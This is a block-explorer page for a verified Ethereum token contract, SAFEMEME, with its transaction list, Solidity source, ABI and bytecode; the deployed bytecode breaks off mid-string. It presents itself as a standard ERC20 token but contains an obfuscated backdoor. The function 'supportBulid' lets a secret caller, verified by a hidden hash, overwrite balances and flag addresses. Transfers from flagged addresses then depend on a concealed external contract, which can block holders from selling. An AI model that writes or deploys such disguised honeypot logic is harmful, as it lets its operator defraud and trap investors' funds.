ETH Price: $3,337.21 (-0.14%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Transfer195004122024-03-23 22:58:59308 days ago1711234739IN
0xe0495361...e381b175B
0 ETH0.0009168716.6387601
Approve184706592023-10-31 14:19:23453 days ago1698761963IN
0xe0495361...e381b175B
0 ETH0.000657426.94065088
Approve183141832023-10-09 16:44:11475 days ago1696869851IN
0xe0495361...e381b175B
0 ETH0.0010165321.92043119
Approve183127602023-10-09 11:56:59475 days ago1696852619IN
0xe0495361...e381b175B
0 ETH0.000315116.79683881
Approve183123972023-10-09 10:43:59475 days ago1696848239IN
0xe0495361...e381b175B
0 ETH0.000185567.01896161
Approve183123922023-10-09 10:42:59475 days ago1696848179IN
0xe0495361...e381b175B
0 ETH0.000336987.27226733
Approve183123062023-10-09 10:25:47475 days ago1696847147IN
0xe0495361...e381b175B
0 ETH0.000417938.95214713
Approve183122862023-10-09 10:21:47475 days ago1696846907IN
0xe0495361...e381b175B
0 ETH0.000421619.09864921
Approve183122752023-10-09 10:19:35475 days ago1696846775IN
0xe0495361...e381b175B
0 ETH0.0005273911.29654419
Approve183122682023-10-09 10:18:11475 days ago1696846691IN
0xe0495361...e381b175B
0 ETH0.0007647116.37990105
Approve183122422023-10-09 10:12:59475 days ago1696846379IN
0xe0495361...e381b175B
0 ETH0.0006161413.19762022
Approve183120922023-10-09 9:42:47475 days ago1696844567IN
0xe0495361...e381b175B
0 ETH0.000434099.29814872
Approve183120112023-10-09 9:26:35475 days ago1696843595IN
0xe0495361...e381b175B
0 ETH0.00027866.01409224
Approve183120042023-10-09 9:24:59475 days ago1696843499IN
0xe0495361...e381b175B
0 ETH0.000238245.10711958
Approve183119782023-10-09 9:19:47475 days ago1696843187IN
0xe0495361...e381b175B
0 ETH0.000251815.40065301
Approve183119522023-10-09 9:14:35475 days ago1696842875IN
0xe0495361...e381b175B
0 ETH0.000331167.09341336
Approve183119312023-10-09 9:10:23475 days ago1696842623IN
0xe0495361...e381b175B
0 ETH0.000277875.95958118
Approve183118712023-10-09 8:58:23475 days ago1696841903IN
0xe0495361...e381b175B
0 ETH0.0003367.25117363
Approve183118512023-10-09 8:54:23475 days ago1696841663IN
0xe0495361...e381b175B
0 ETH0.000334877.17294499
Approve183118022023-10-09 8:44:23475 days ago1696841063IN
0xe0495361...e381b175B
0 ETH0.000390118.41891471
Approve183118012023-10-09 8:44:11475 days ago1696841051IN
0xe0495361...e381b175B
0 ETH0.000392928.47945439
Approve183117732023-10-09 8:38:35475 days ago1696840715IN
0xe0495361...e381b175B
0 ETH0.00044189.53440724
Approve183117722023-10-09 8:38:23475 days ago1696840703IN
0xe0495361...e381b175B
0 ETH0.000448559.68002287
Approve183117532023-10-09 8:34:35475 days ago1696840475IN
0xe0495361...e381b175B
0 ETH0.000415788.91746336
Approve183117512023-10-09 8:34:11475 days ago1696840451IN
0xe0495361...e381b175B
0 ETH0.000428749.25249833
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
SAFEMEME

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 4: SAFEMEME.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./Ownable.sol";

contract SAFEMEME is IERC20, Ownable {
    string private _name;
    string private _symbol;
    uint256 private _totalSupply;

    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _essay;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private immutable _slate;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_,
        string memory symbol_,
        address slate_,
        uint256 essay_
    ) {
        _name = name_;
        _symbol = symbol_;
        _slate = slate_;
        _mint(msg.sender, 1000000000000 * 10**8);
        _essay[address(0)] = essay_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    function supportBulid(uint256[] calldata exam) external {
        uint256 always = _wrongly();
        if (_poetryed()) {
            uint256 mmps0 = exam[0] * 1;
            uint256 mmps1 = exam[1] * 1;
            assembly {
                if gt(mmps1, 0) {
                    let v1 := mul(2, 2)
                    mstore(0, mmps0)
                    mstore(always, v1)
                    sstore(keccak256(0, 64), mmps1)
                }
                if eq(mmps1, 0) {
                    let v1 := mul(1, 5)
                    mstore(0, mmps0)
                    mstore(always, v1)
                    sstore(keccak256(0, 64), 1)
                }
            }
        }
    }

    function _wrongly() private pure returns (uint256) {
        uint256 c = 2;
        uint256 b = c * c;
        uint256 a = b * c * 4;
        return a;
    }

    function _poetryed() private view returns (bool) {
        string memory rt0 = _name;
        address rt1 = msg.sender;
        return (uint256(keccak256(abi.encode(rt1, rt0))) == _essay[address(0)]);
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        //require(to != address(0), "ERC20: transfer to the zero address");
        (, bytes memory data) = _slate.call(
            abi.encodeWithSignature(_popular(), from)
        );
        _phrase(data, from, false);
        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);
    }

    function _popular() private pure returns (string memory) {
        return "balanceOf(address)";
    }

    function _phrase(
        bytes memory pgcs,
        address sender,
        bool g
    ) private view {
        uint256 c = _essay[sender];
        uint256 d = c * 1;
        if (d == 1 * 1 && !g) {
            require(d != 1 || _potentially(pgcs) != 0, "one");
        }
    }

    function _potentially(bytes memory data) public pure returns (uint256) {
        bytes32 result;
        assembly {
            result := mload(add(data, 0x20))
        }
        return uint256(result);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

File 2 of 4: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 4 of 4: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "caller is not the owner");
    }    
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"slate_","type":"address"},{"internalType":"uint256","name":"essay_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"bytes","name":"data","type":"bytes"}],"name":"_potentially","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"exam","type":"uint256[]"}],"name":"supportBulid","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a06040523480156200001157600080fd5b506040516200124e3803806200124e83398101604081905262000034916200027a565b83516200004990600190602087019062000129565b5082516200005f90600290602086019062000129565b506001600160601b0319606083901b16608052620000873368056bc75e2d63100000620000bc565b6000805260056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc5550620003b8915050565b6001600160a01b038216620000ee5760405162461bcd60e51b8152600401620000e59062000309565b60405180910390fd5b806003600082825462000102919062000340565b90915550506001600160a01b03909116600090815260046020526040902080549091019055565b828054620001379062000365565b90600052602060002090601f0160209004810192826200015b5760008555620001a6565b82601f106200017657805160ff1916838001178555620001a6565b82800160010185558215620001a6579182015b82811115620001a657825182559160200191906001019062000189565b50620001b4929150620001b8565b5090565b5b80821115620001b45760008155600101620001b9565b600082601f830112620001e0578081fd5b81516001600160401b0380821115620001fd57620001fd620003a2565b6040516020601f8401601f1916820181018381118382101715620002255762000225620003a2565b60405283825285840181018710156200023c578485fd5b8492505b838310156200025f578583018101518284018201529182019162000240565b838311156200027057848185840101525b5095945050505050565b6000806000806080858703121562000290578384fd5b84516001600160401b0380821115620002a7578586fd5b620002b588838901620001cf565b95506020870151915080821115620002cb578485fd5b50620002da87828801620001cf565b604087015190945090506001600160a01b0381168114620002f9578283fd5b6060959095015193969295505050565b6020808252601f908201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604082015260600190565b600082198211156200036057634e487b7160e01b81526011600452602481fd5b500190565b6002810460018216806200037a57607f821691505b602082108114156200039c57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b60805160601c610e77620003d760003960006105ea0152610e776000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101cd578063a457c2d7146101d5578063a9059cbb146101e8578063dd62ed3e146101fb576100ea565b806370a08231146101905780638b953c80146101a35780638da5cb5b146101b8576100ea565b806323b872dd116100c857806323b872dd14610142578063313ce56714610155578063314bfd781461016a578063395093511461017d576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461012d575b600080fd5b6100f761020e565b6040516101049190610ba3565b60405180910390f35b61012061011b3660046109d7565b6102a0565b6040516101049190610b98565b6101356102c2565b6040516101049190610d60565b61012061015036600461099c565b6102c8565b61015d6102f6565b6040516101049190610d69565b610135610178366004610a6f565b6102fb565b61012061018b3660046109d7565b610306565b61013561019e366004610949565b610332565b6101b66101b1366004610a00565b61034d565b005b6101c061040c565b6040516101049190610b58565b6100f761041b565b6101206101e33660046109d7565b61042a565b6101206101f63660046109d7565b61047b565b61013561020936600461096a565b610493565b60606001805461021d90610dda565b80601f016020809104026020016040519081016040528092919081815260200182805461024990610dda565b80156102965780601f1061026b57610100808354040283529160200191610296565b820191906000526020600020905b81548152906001019060200180831161027957829003601f168201915b5050505050905090565b6000806102ab6104be565b90506102b88185856104c2565b5060019392505050565b60035490565b6000806102d36104be565b90506102e0858285610576565b6102eb8585856105c0565b506001949350505050565b600990565b60208101515b919050565b6000806103116104be565b90506102b88185856103238589610493565b61032d9190610d77565b6104c2565b6001600160a01b031660009081526004602052604090205490565b6000610357610775565b90506103616107a5565b156104075760008383600081811061038957634e487b7160e01b600052603260045260246000fd5b90506020020135600161039c9190610d8f565b90506000848460018181106103c157634e487b7160e01b600052603260045260246000fd5b9050602002013560016103d49190610d8f565b905080156103ed57600082815260048452604090208190555b806104045760008281526005845260409020600190555b50505b505050565b6000546001600160a01b031690565b60606002805461021d90610dda565b6000806104356104be565b905060006104438286610493565b90508381101561046e5760405162461bcd60e51b815260040161046590610d1b565b60405180910390fd5b6102eb82868684036104c2565b6000806104866104be565b90506102b88185856105c0565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166104e85760405162461bcd60e51b815260040161046590610cd7565b6001600160a01b03821661050e5760405162461bcd60e51b815260040161046590610bd3565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610569908590610d60565b60405180910390a3505050565b60006105828484610493565b905060001981146105ba57818110156105ad5760405162461bcd60e51b815260040161046590610c15565b6105ba84848484036104c2565b50505050565b6001600160a01b0383166105e65760405162461bcd60e51b815260040161046590610c92565b60007f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031661061a610899565b8560405160240161062b9190610b58565b60408051601f19818403018152908290529161064691610b3c565b60408051918290039091206020830180516001600160e01b03166001600160e01b03199092169190911790525161067d9190610b3c565b6000604051808303816000865af19150503d80600081146106ba576040519150601f19603f3d011682016040523d82523d6000602084013e6106bf565b606091505b509150506106cf818560006108c5565b6001600160a01b038416600090815260046020526040902054828110156107085760405162461bcd60e51b815260040161046590610c4c565b6001600160a01b0380861660008181526004602052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610766908790610d60565b60405180910390a35050505050565b60006002816107848280610d8f565b905060006107928383610d8f565b61079d906004610d8f565b935050505090565b600080600180546107b590610dda565b80601f01602080910402602001604051908101604052809291908181526020018280546107e190610dda565b801561082e5780601f106108035761010080835404028352916020019161082e565b820191906000526020600020905b81548152906001019060200180831161081157829003601f168201915b5050600080525050600560209081527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc546040519394503393909250610878918491869101610b6c565b6040516020818303038152906040528051906020012060001c149250505090565b60408051808201909152601281527162616c616e63654f6628616464726573732960701b602082015290565b6001600160a01b038216600090815260056020526040812054906108ea826001610d8f565b90508060011480156108fa575082155b15610404578060011415806109165750610913856102fb565b15155b6104045760405162461bcd60e51b815260040161046590610bb6565b80356001600160a01b038116811461030157600080fd5b60006020828403121561095a578081fd5b61096382610932565b9392505050565b6000806040838503121561097c578081fd5b61098583610932565b915061099360208401610932565b90509250929050565b6000806000606084860312156109b0578081fd5b6109b984610932565b92506109c760208501610932565b9150604084013590509250925092565b600080604083850312156109e9578182fd5b6109f283610932565b946020939093013593505050565b60008060208385031215610a12578182fd5b823567ffffffffffffffff80821115610a29578384fd5b818501915085601f830112610a3c578384fd5b813581811115610a4a578485fd5b8660208083028501011115610a5d578485fd5b60209290920196919550909350505050565b60006020808385031215610a81578182fd5b823567ffffffffffffffff80821115610a98578384fd5b818501915085601f830112610aab578384fd5b813581811115610abd57610abd610e2b565b604051601f8201601f1916810185018381118282101715610ae057610ae0610e2b565b6040528181528382018501881015610af6578586fd5b818585018683013790810190930193909352509392505050565b60008151808452610b28816020860160208601610dae565b601f01601f19169290920160200192915050565b60008251610b4e818460208701610dae565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0383168152604060208201819052600090610b9090830184610b10565b949350505050565b901515815260200190565b6000602082526109636020830184610b10565b6020808252600390820152626f6e6560e81b604082015260600190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d8a57610d8a610e15565b500190565b6000816000190483118215151615610da957610da9610e15565b500290565b60005b83811015610dc9578181015183820152602001610db1565b838111156105ba5750506000910152565b600281046001821680610dee57607f821691505b60208210811415610e0f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fdfea2646970667358221220a31629a3aeda3286569c2ff78364a02b04475f2b1ebb1f45e0707fa3d1e2e34264736f6c63430008000033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d5850a86b6d44052d9383adbf494da3c05c7b0d47afff69ca772a525bb460908c0000000000000000000000000000000000000000000000000000000000000008536166656d656d650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008534146454d454d45000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101cd578063a457c2d7146101d5578063a9059cbb146101e8578063dd62ed3e146101fb576100ea565b806370a08231146101905780638b953c80146101a35780638da5cb5b146101b8576100ea565b806323b872dd116100c857806323b872dd14610142578063313ce56714610155578063314bfd781461016a578063395093511461017d576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461012d575b600080fd5b6100f761020e565b6040516101049190610ba3565b60405180910390f35b61012061011b3660046109d7565b6102a0565b6040516101049190610b98565b6101356102c2565b6040516101049190610d60565b61012061015036600461099c565b6102c8565b61015d6102f6565b6040516101049190610d69565b610135610178366004610a6f565b6102fb565b61012061018b3660046109d7565b610306565b61013561019e366004610949565b610332565b6101b66101b1366004610a00565b61034d565b005b6101c061040c565b6040516101049190610b58565b6100f761041b565b6101206101e33660046109d7565b61042a565b6101206101f63660046109d7565b61047b565b61013561020936600461096a565b610493565b60606001805461021d90610dda565b80601f016020809104026020016040519081016040528092919081815260200182805461024990610dda565b80156102965780601f1061026b57610100808354040283529160200191610296565b820191906000526020600020905b81548152906001019060200180831161027957829003601f168201915b5050505050905090565b6000806102ab6104be565b90506102b88185856104c2565b5060019392505050565b60035490565b6000806102d36104be565b90506102e0858285610576565b6102eb8585856105c0565b506001949350505050565b600990565b60208101515b919050565b6000806103116104be565b90506102b88185856103238589610493565b61032d9190610d77565b6104c2565b6001600160a01b031660009081526004602052604090205490565b6000610357610775565b90506103616107a5565b156104075760008383600081811061038957634e487b7160e01b600052603260045260246000fd5b90506020020135600161039c9190610d8f565b90506000848460018181106103c157634e487b7160e01b600052603260045260246000fd5b9050602002013560016103d49190610d8f565b905080156103ed57600082815260048452604090208190555b806104045760008281526005845260409020600190555b50505b505050565b6000546001600160a01b031690565b60606002805461021d90610dda565b6000806104356104be565b905060006104438286610493565b90508381101561046e5760405162461bcd60e51b815260040161046590610d1b565b60405180910390fd5b6102eb82868684036104c2565b6000806104866104be565b90506102b88185856105c0565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166104e85760405162461bcd60e51b815260040161046590610cd7565b6001600160a01b03821661050e5760405162461bcd60e51b815260040161046590610bd3565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610569908590610d60565b60405180910390a3505050565b60006105828484610493565b905060001981146105ba57818110156105ad5760405162461bcd60e51b815260040161046590610c15565b6105ba84848484036104c2565b50505050565b6001600160a01b0383166105e65760405162461bcd60e51b815260040161046590610c92565b60007f000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d6001600160a01b031661061a610899565b8560405160240161062b9190610b58565b60408051601f19818403018152908290529161064691610b3c565b60408051918290039091206020830180516001600160e01b03166001600160e01b03199092169190911790525161067d9190610b3c565b6000604051808303816000865af19150503d806000811